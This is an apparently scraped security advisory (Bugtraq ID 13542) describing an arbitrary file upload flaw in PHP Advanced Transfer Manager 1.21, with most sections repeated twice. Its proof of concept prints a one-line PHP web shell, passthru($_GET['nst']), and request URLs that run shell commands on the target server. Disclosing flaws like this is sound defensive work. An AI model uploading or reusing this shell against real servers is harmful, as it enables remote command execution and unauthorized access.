PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
BID:13542
Info
PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
| Bugtraq ID: | 13542 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 06 2005 12:00AM |
| Updated: | May 06 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHP Advanced Transfer Manager PHP Advanced Transfer Manager 1.21 |
| Not Vulnerable: | |
Discussion
PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files.
If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server.
This issue reportedly affects PHP Advanced Transfer Manager version 1.21; earlier versions may also be vulnerable.
PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files.
If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server.
This issue reportedly affects PHP Advanced Transfer Manager version 1.21; earlier versions may also be vulnerable.
Exploit / POC
PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
No exploit is required.
The following proof of concepts are available:
Create file:
nst.php.ns
<pre>
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la
or
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt
No exploit is required.
The following proof of concepts are available:
Create file:
nst.php.ns
<pre>
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la
or
<?
passthru($_GET['nst']);
?>
Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt
Solution / Fix
PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability
References:
References:
- phpATM Homepage (PHP Advanced Transfer Manager)
- PHP Advanced Transfer Manager v1.21 ([email protected])